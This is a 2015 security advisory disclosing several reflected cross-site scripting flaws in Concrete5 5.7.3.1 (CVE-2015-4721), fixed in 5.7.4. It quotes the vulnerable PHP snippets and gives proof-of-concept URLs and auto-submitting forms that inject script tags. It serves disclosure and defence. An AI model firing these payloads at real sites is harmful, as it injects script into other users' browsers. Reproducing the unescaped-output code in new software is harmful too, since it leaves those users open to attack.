The document describes multiple reflected cross-site scripting (XSS) vulnerabilities identified in Concrete5 version 5.7.3.1. User input passed through various request parameters was not properly sanitized before being used to generate HTML output, allowing attackers to potentially inject arbitrary JavaScript code. The vulnerabilities were addressed in Concrete5 version 5.7.4. The vulnerabilities included issues in files related to page versions, user selection, group searching, language setup, single page loading, and attribute selection.
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
Concrete5 Multiple Reflected XSS Advisory
1. Edition: 1.0
Last Edit: 24/06/2015
Cassification: Not restricted
Multiple Reflected Cross Site
Scripting Vulnerabilities in
Concrete5 version 5.7.3.1
Author: Egidio Romano
2. Multiple Reflected XSS in Concrete5 version 5.7.3.1
Edition: v1.0 Date: 24/06/2015
Not restricted Page 1/4
Summary
Vulnerabilities Class Cross Site Scripting (XSS)
CVE ID CVE-2015-4721
Remote Yes
Local No
Published June 6, 2015
Updated June 24, 2015
Credit Egidio Romano
Vulnerable Version 5.7.3.1 and probably prior versions
Fixed On 5.7.4
Other References https://hackerone.com/reports/59661
http://blog.mindedsecurity.com/2015/06/multiple-
security-issues-discovered-in-concrete5-part1.html
Description
Concrete5 is vulnerable to some reflected Cross Site Scripting (XSS) attacks because
certain user input is being used within the output it generates without validating or
encoding it.
Vulnerabilities Details
Following are the reflected XSS vulnerabilities identified:
File: /concrete/views/panels/details/page/versions.php (lines 5-14):
<?php foreach($_REQUEST['cvID'] as $cvID) {
$tabs[] = array('view-version-' . $cvID, t('Version %s', $cvID), $checked);
$checked = false;
}
print $ih->tabs($tabs);
foreach($_REQUEST['cvID'] as $cvID) { ?>
3. Multiple Reflected XSS in Concrete5 version 5.7.3.1
Edition: v1.0 Date: 24/06/2015
Not restricted Page 2/4
<div id="ccm-tab-content-view-version-<?php echo $cvID?>" style="display: <?php
echo $display?>; height: 100%">
<iframe border="0" id="v<?php echo time()?>" frameborder="0" height="100%"
width="100%" src="<?php echo
REL_DIR_FILES_TOOLS_REQUIRED?>/pages/preview_version?cvID=<?php echo $cvID?>&cID=<?php
echo $_REQUEST['cID']?>" />
User input passed through the “cvID” and “cID” request parameters is not properly
sanitized before being used to generate HTML output. This can be exploited by an attacker
to inject arbitrary script code into another user’s browser by tricking the victim user into
visiting malicious URLs like these:
http://[host]/index.php/ccm/system/panels/details/page/versions?cID=1&cvID[]=%22%3E%3Cscri
pt%3Ealert%28/XSS/%29%3C/script%3E%3C!--
http://[host]/index.php/ccm/system/panels/details/page/versions?cvID[]=1&cID=1%22%3E%3C/if
rame%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
File: /concrete/src/Form/Service/Widget/UserSelector.php (lines 17-35):
public function selectUser($fieldName, $uID = false, $javascriptFunc …
$selectedUID = 0;
if (isset($_REQUEST[$fieldName])) {
$selectedUID = $_REQUEST[$fieldName];
} else if ($uID > 0) {
$selectedUID = $uID;
}
$html = '';
$html .= '<div class="ccm-summary-selected-item"><div class="ccm-summary-
selected-item-inner"><strong class="ccm-summary-selected-item-label">';
if ($selectedUID > 0) {
$ui = UserInfo::getByID($selectedUID);
$html .= $ui->getUserName();
}
$html .= '</strong></div>';
$identifier = new ConcreteCoreUtilityServiceIdentifier();
$selector = $identifier->getString(32);
$html .= '<a class="ccm-sitemap-select-item" data-form-user-selector="' .
$selector . '" dialog-append-buttons="true" dialog-width="90%" dialog-height="70%" dialog-
modal="false" dialog-title="' . t('Choose User') . '" href="' .
URL::to('/ccm/system/dialogs/user/search') . '">' . t('Select User') . '</a>';
$html .= '<input type="hidden" data-form-user-selector-input="' . $selector
. '" name="' . $fieldName . '" value="' . $selectedUID . '">';/>
User input passed through the “uID” request parameter is not properly sanitized before
being used to generate HTML output. This can be exploited by an attacker to inject
arbitrary script code into another user’s browser by tricking the victim user into visiting a
malicious URL like this:
4. Multiple Reflected XSS in Concrete5 version 5.7.3.1
Edition: v1.0 Date: 24/06/2015
Not restricted Page 3/4
http://[host]/index.php/ccm/system/panels/details/page/attributes?cID=1&uID=%22%3E%3Cscrip
t%3Ealert%28/XSS/%29%3C/script%3E
File: /concrete/elements/group/search.php (lines 4-20):
$searchRequest = $_REQUEST;
$result = Loader::helper('json')->encode($controller->getSearchResultObject()-
>getJSONObject());
$tree = GroupTree::get();
$guestGroupNode = GroupTreeNode::getTreeNodeByGroupID(GUEST_GROUP_ID);
$registeredGroupNode = GroupTreeNode::getTreeNodeByGroupID(REGISTERED_GROUP_ID);
?>
<style type="text/css">
div[data-search=groups] form.ccm-search-fields {
margin-left: 0px !important;
}
</style>
<div data-search="groups">
<script type="text/template" data-template="search-form">
<form role="form" data-search-form="groups" action="<?php echo
URL::to('/ccm/system/search/groups/submit')?>" class="form-inline ccm-search-fields ccm-
search-fields-none">
<input type="hidden" name="filter" value="<?php echo $searchRequest['filter']?>" />
User input passed through the “filter” request parameter is not properly sanitized before
being used to generate HTML output. This can be exploited by an attacker to inject
arbitrary script code into another user’s browser by tricking the victim user into visiting a
malicious URL like this:
http://[host]/index.php/dashboard/users/groups?filter=%22%3E%3Cscript%3Ealert%28/XSS/%29%3
C/script%3E
URL: http://[host]/index.php/dashboard/system/multilingual/setup/load_icon
User input passed through the “msCountry” POST parameter is not properly sanitized
before being used to generate HTML output. This can be exploited by an attacker to inject
arbitrary script code into another user’s browser by tricking the victim user into visiting a
malicious web page like this:
<html>
<body>
<form method="POST"
action="http://[host]/index.php/dashboard/system/multilingual/setup/load_icon">
<input type="hidden" name="msCountry" value='"><script>alert(/XSS/)</script><!--'>
</form>
5. Multiple Reflected XSS in Concrete5 version 5.7.3.1
Edition: v1.0 Date: 24/06/2015
Not restricted Page 4/4
<script>document.forms[0].submit()</script>
</body>
</html>
URL: http://[host]/index.php/dashboard/pages/single
User input passed through the “pageURL” POST parameter is not properly sanitized before
being used to generate HTML output. This can be exploited by an attacker to inject
arbitrary script code into another user’s browser by tricking the victim user into visiting a
malicious web page like this:
<html>
<body>
<form method="POST" action="http://[host]/index.php/dashboard/pages/single">
<input type="hidden" name="pageURL" value='"><script>alert(/XSS/)</script>'>
</form>
<script>document.forms[0].submit()</script>
</body>
</html>
File: /concrete/attributes/select/form.php (lines 55-60):
$vals = $this->post('atSelectNewOption');
if (is_array($vals)) {
foreach($vals as $v) { ?>
<div class="newAttrValue">
<?php echo $form->hidden($this-
>field('atSelectNewOption') . '[]', $v)?>
<span class="badge"><?php echo $v?></span> />
User input passed through the “atSelectNewOption” POST parameter is not properly
sanitized before being used to generate HTML output. This can be exploited by an attacker
to inject arbitrary script code into another user’s browser.